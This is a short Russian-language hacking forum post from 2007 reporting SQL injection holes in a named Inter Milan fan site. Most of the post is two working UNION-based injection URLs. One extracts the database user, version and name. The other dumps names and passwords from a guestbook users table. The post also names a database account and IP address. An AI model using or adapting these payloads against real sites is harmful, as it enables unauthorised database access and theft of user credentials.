24.10.2007, 20:35
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
// www.interomania.ru - сайт болелов Интера
есть дырка в news.php, но скрипт от юзера z34244_news@85.249.135.6, доступа никуда кроме z34244_news нет, аналогично со скриптом main.table.php - дырка
http://www.interomania.ru/controlsystem/main.table.php?view=teamresults&team=-CSKA')+union+select+1,2,3,4,5,6,concat_ws(0x3a,use r(),version(),database()),8,9/*
lдоступ к базе z34244_stat
потом нашлась гостевуха и таблицы с пользователями
http://gb.interomania.ru/gb.php?action=viewuser&name=311'+union+select+conc at_ws(0x3a,name,pass)+from+users/*
вывод посимвольный |
|
|